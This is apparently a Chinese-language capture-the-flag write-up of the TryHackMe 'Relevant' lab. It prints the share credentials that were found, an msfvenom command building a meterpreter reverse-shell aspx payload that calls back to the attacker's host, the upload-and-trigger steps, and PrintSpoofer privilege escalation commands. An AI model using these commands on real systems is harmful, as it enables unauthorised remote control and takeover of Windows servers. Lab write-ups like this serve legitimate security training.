TryHackMe | Relevant Writeup
信息收集
有2个 Web 服务(80/tcp、49663/tcp)以及网络共享(445/tcp和 rdp的3389端口。
有个nt4wrksv,连接看看
有一个密码文件,打开是base64
解码
Bob - !P@$$W0rD!123 Bill - Juw4nnaM4n420696969!$$$
想着拿密码先连接一波,直接就开始连接3389,好家伙,一个都不行
那就先看看80和49663端口吧,拿gobuster扫一下
发现了有个/nt4wksv目录,大胆推测这个就是我们共享文件的目录
果然访问到了
所以我们的方向就很明确了,上传shell到nt4wksv,然后利用web访问激活反弹shell
首先生成一个反向shell,而且我们知道49663端口是IIS web服务,所以我们可以用aspx文件
.aspx是ASP.NET 页面的扩展名。它无非是在静态HTML网页里面嵌入了动态的指令(这些动态指令是由各种脚本语言编写的,是由IIS服务器上的脚本引擎来执行的) msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=10.17.58.33 lport=1234 -f aspx -o shell.aspx
然后再在共享文件处上传
再我们网页端访问前先打开监听,然后再访问
然后访问
http://10.10.94.191:49663/nt4wrksv/shell.aspx
然后就得到了shell,然后执行shell后就可先找user.txt
提权
root.txt一定是需要最高权限的,所以我们需要提权
先看看令牌,检查我们的权限会发现我们被授予 SeImpersonatePrivilege
搜索了一下,确实存在可以利用的漏洞,利用PrintSpoofer来提权
下载工具
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
再利用文件共享上传到目标服务器上
再执行以下命令执行
PrintSpoofer64.exe -i -c cmd